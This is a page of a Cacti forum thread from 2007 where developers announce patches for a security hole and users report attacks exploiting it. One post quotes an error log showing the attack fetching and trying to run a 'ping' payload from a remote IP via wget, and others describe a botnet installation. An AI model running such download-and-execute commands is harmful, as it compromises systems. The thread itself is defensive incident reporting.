Cacti (home)ForumsRepositoryDocumentation
Cacti: offical forums and support
It is currently Fri Oct 24, 2014 6:08 pm

All times are UTC - 5 hours




Post new topic Reply to topic  [ 60 posts ]  Go to page Previous  1, 2, 3, 4  Next
Author Message
 Post subject:
PostPosted: Wed Jan 03, 2007 4:58 pm 
Offline
Developer/Forum Admin
User avatar

Joined: Mon Nov 17, 2003 6:35 pm
Posts: 5904
Location: Michigan, USA
Patch will be released this week.

_________________
Tony Roman
Experience is what causes a person to make new mistakes instead of old ones.
There are only 3 way to complete a project: Good, Fast or Cheap, pick two.
With age comes wisdom, what you choose to do with it determines whether or not you are wise.


Top
 Profile  
 
 Post subject:
PostPosted: Mon Jan 08, 2007 10:34 am 
Offline
Developer/Forum Admin
User avatar

Joined: Mon Nov 17, 2003 6:35 pm
Posts: 5904
Location: Michigan, USA
Patches for this issue are now available for the following versions:

0.8.6i
0.8.6h

_________________
Tony Roman
Experience is what causes a person to make new mistakes instead of old ones.
There are only 3 way to complete a project: Good, Fast or Cheap, pick two.
With age comes wisdom, what you choose to do with it determines whether or not you are wise.


Top
 Profile  
 
 Post subject:
PostPosted: Tue Jan 09, 2007 3:15 pm 
Offline
Cacti User
User avatar

Joined: Tue Feb 10, 2004 9:28 am
Posts: 106
Location: Frisco, TX
Can someone update the main page and maybe post something to Announcements about the available patches?


Top
 Profile  
 
 Post subject:
PostPosted: Tue Jan 09, 2007 3:18 pm 
Offline

Joined: Tue Jun 08, 2004 5:34 am
Posts: 26
My site just got hit. It looked like a brute force attack rather than using the link from the "Sites that use Cacti" page. I shall post the web server logs shortly. Luckily I caught it before any damage was done; however I shall be reimaging the server tomorrow.


Top
 Profile  
 
 Post subject:
PostPosted: Tue Jan 09, 2007 4:04 pm 
Offline

Joined: Tue Jun 08, 2004 5:34 am
Posts: 26
Please see the log excerpt attached.


Attachments:
File comment: Apache log file
cacti-httpd-access_log.txt [5.95 KiB]
Downloaded 1350 times
Top
 Profile  
 
 Post subject:
PostPosted: Tue Jan 09, 2007 4:11 pm 
Offline
Developer/Forum Admin
User avatar

Joined: Mon Nov 17, 2003 6:35 pm
Posts: 5904
Location: Michigan, USA
That's not the standard exploit.

Um... I will decode later to see what they where attempting to do. Thanks for the log.

_________________
Tony Roman
Experience is what causes a person to make new mistakes instead of old ones.
There are only 3 way to complete a project: Good, Fast or Cheap, pick two.
With age comes wisdom, what you choose to do with it determines whether or not you are wise.


Top
 Profile  
 
 Post subject:
PostPosted: Tue Jan 09, 2007 11:59 pm 
Offline

Joined: Tue Mar 14, 2006 11:13 am
Posts: 11
I think it's the same vulnerability, slightly different code but they're still injecting a command into the SQL database.

The command calls wget to get a ping script which it then calls and wget's some other things. A similar command was used on my machine, except they downloaded two images which were tar balls containing scripts and an httpd that connected my machine to an underworld botnet...


Top
 Profile  
 
 Post subject:
PostPosted: Wed Jan 10, 2007 4:04 am 
Offline

Joined: Tue Jun 08, 2004 5:34 am
Posts: 26
These are a couple of files I managed to retrieve in /etc/cron.d/, the exploit managed to start sshd running on [::]:80 and [::]:443.


Attachments:
hack-attempt-cacti.tgz [309.12 KiB]
Downloaded 709 times
Top
 Profile  
 
 Post subject:
PostPosted: Wed Jan 10, 2007 7:21 am 
Offline

Joined: Thu Aug 31, 2006 2:36 am
Posts: 1
Location: Denmark
I've seen the same, but from a other ip.
If I try to convert it - it turns out to something like this.
and the ping file it got from 143.225.151.190

At this moment I'm very glad for SELinux


Attachments:
File comment: ping file from the remote server
ping.txt [731 Bytes]
Downloaded 889 times
File comment: converted sql
convert.txt [1.09 KiB]
Downloaded 1006 times
File comment: apache log
httplog.txt [2.5 KiB]
Downloaded 920 times
Top
 Profile  
 
 Post subject:
PostPosted: Wed Jan 10, 2007 9:34 am 
Offline
Developer/Forum Admin
User avatar

Joined: Mon Nov 17, 2003 6:35 pm
Posts: 5904
Location: Michigan, USA
Interesting...

Glad I have a local firewall configured.. :)

_________________
Tony Roman
Experience is what causes a person to make new mistakes instead of old ones.
There are only 3 way to complete a project: Good, Fast or Cheap, pick two.
With age comes wisdom, what you choose to do with it determines whether or not you are wise.


Top
 Profile  
 
 Post subject:
PostPosted: Wed Jan 10, 2007 4:49 pm 
Offline
Developer
User avatar

Joined: Tue May 14, 2002 5:08 pm
Posts: 14861
Location: MI, USA
Nasty, yet elegant exploit. It's rather scary.

TheWitness

_________________
True understanding begins only when we realize how little we truly understand...

Life is an adventure, let yours begin with Cacti!

Author of MacTrack, Boost, CLog, SpikeKill, Platform RTM, DSStats, maintainer of Spine, lot's of unpublished work and most of Cacti's bugs.
_________________
Official Cacti Documentation
Gandalfs Official Debugging Help
Central Plugin Repository
Central Templates Repository


Top
 Profile  
 
 Post subject: Announce mailing list
PostPosted: Thu Jan 11, 2007 10:29 pm 
Offline

Joined: Wed Nov 15, 2006 8:07 pm
Posts: 16
Location: Warrington, PA
PLEASE! Someone post this to the announce mailing list. It needs wider attention.

I've just submitted a patch for the FreeBSD port.

_________________
--
Dan Langille - http://www.langille.org/


Top
 Profile  
 
 Post subject:
PostPosted: Thu Jan 11, 2007 11:41 pm 
Offline
Developer
User avatar

Joined: Tue May 14, 2002 5:08 pm
Posts: 14861
Location: MI, USA
Done. Also, if you applied the patch and it broke your timespan selector. So long as you are not running the Timeshifter from Gandolf, you can apply the following file directly. I will correct the issue.

TheWitness


Attachments:
inc_timespan_selector.zip [1.61 KiB]
Downloaded 843 times

_________________
True understanding begins only when we realize how little we truly understand...

Life is an adventure, let yours begin with Cacti!

Author of MacTrack, Boost, CLog, SpikeKill, Platform RTM, DSStats, maintainer of Spine, lot's of unpublished work and most of Cacti's bugs.
_________________
Official Cacti Documentation
Gandalfs Official Debugging Help
Central Plugin Repository
Central Templates Repository
Top
 Profile  
 
 Post subject: Security Advisory link
PostPosted: Fri Jan 12, 2007 9:19 am 
Offline

Joined: Wed Nov 15, 2006 8:07 pm
Posts: 16
Location: Warrington, PA
See http://secunia.com/advisories/23528/

_________________
--
Dan Langille - http://www.langille.org/


Top
 Profile  
 
 Post subject:
PostPosted: Sat Jan 13, 2007 11:29 am 
Offline

Joined: Thu Dec 08, 2005 7:13 pm
Posts: 30
I had the same as Ning.

However, I have the following in my error log:

Code:
--05:54:11--  http://143.225.151.190/libsh/ping.txt
           => `ping.txt'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 345 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
--05:54:11--  http://143.225.151.190/libsh/ping
           => `ping'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 [text/plain]
ping: Permission denied

Cannot write to `ping' (Permission denied).
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
sh: curl: command not found
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory


Do you think that means nothing was affected? I can't see any evidence of it anyway. I've applied the fix now.. There should really be a way to tell everyone about that! Had I not have been checking through my error logs I wouldn't have known. [/code]


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 60 posts ]  Go to page Previous  1, 2, 3, 4  Next

All times are UTC - 5 hours


Who is online

Users browsing this forum: No registered users and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  

Protected by Anti-Spam ACP Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group